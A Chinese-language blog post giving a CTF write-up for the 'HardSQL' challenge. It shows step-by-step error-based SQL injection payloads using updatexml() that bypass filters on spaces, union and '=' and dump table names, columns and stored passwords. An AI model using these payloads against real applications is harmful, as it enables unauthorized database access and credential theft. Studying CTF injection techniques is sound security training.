[极客大挑战 2019]HardSQL

-眼里有星河-

已于 2022-02-12 18:21:25 修改

阅读量544

点赞数 1

分类专栏：题目wp 文章标签：数据库 database

于 2022-02-12 18:17:23 首次发布

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/m0_62092622/article/details/122899713

版权

题目wp 专栏收录该内容

38 篇文章 0 订阅

订阅专栏

打开题目：

随便输入一个用户名密码，提示密码错误，但是输入1' union select 1,2,3#，显示的是不同的语句

经检查，发现空格被过滤了，所以我们需要用括号来代替空格

而且由于union被过滤了，所以想到了updataxml函数，具体可参考这篇文章

updatexml函数_m0_62092622的博客-CSDN博客https://blog.csdn.net/m0_62092622/article/details/122721621?spm=1001.2014.3001.5501

等号 " = " 也被过滤了，所以考虑用like替代，先查询表1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),'~'),1))#

继续查询列名，1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),'~'),1))#

查询数据1'or(updatexml(1,concat('~',(select(group_concat(username,'~',password))from(H4rDsq1)),'~'),1))#

可是这里可能显示长度有限，所以flag并未显示全

right()语句可以从右往左查

继续查询右部分1'or(updatexml(1,concat('~',(select(group_concat((right(password,20))))from(H4rDsq1)),'~'),1))#

拼接得出flag

-眼里有星河-

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
[极客大挑战 2019]HardSQL

打开题目：随便输入一个用户名密码，提示密码错误，但是输入1' union select 1,2,3#，显示的是不同的语句经检查，发现空格被过滤了，所以我们需要用括号来代替空格而且由于union被过滤了，所以想到了updataxml函数，具体可参考这篇文章updatexml函数_m0_62092622的博客-CSDN博客 https://blog.csdn.net/m0_62092622/article/details/122721621?spm=1001.2014.3001.550
复制链接

扫一扫

专栏目录

-眼里有星河-

博客等级

码龄3年

83
原创

120
点赞

146
收藏

246
粉丝

关注

私信

热门文章

分类专栏

题目wp 38篇
C++容器 7篇
周报 11篇
MySQL 8篇

最新评论

[SUCTF 2019]EasySQL
m0_64777251: 师傅把字典分享到网上吧
[SUCTF 2019]EasySQL
-眼里有星河-: 不知道怎么给你发过去不过我也是在网上找的
[SUCTF 2019]EasySQL
user_dd: 求Fuzz字典网上找的太杂啦
[SUCTF 2019]EasySQL
-眼里有星河-: 抱歉抱歉是我打错了谢谢指正
[SUCTF 2019]EasySQL
-眼里有星河-: 是指第二个方法吗

您愿意向朋友推荐“博客详情页”吗？

强烈不推荐
不推荐
一般般
推荐
强烈推荐

提交

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。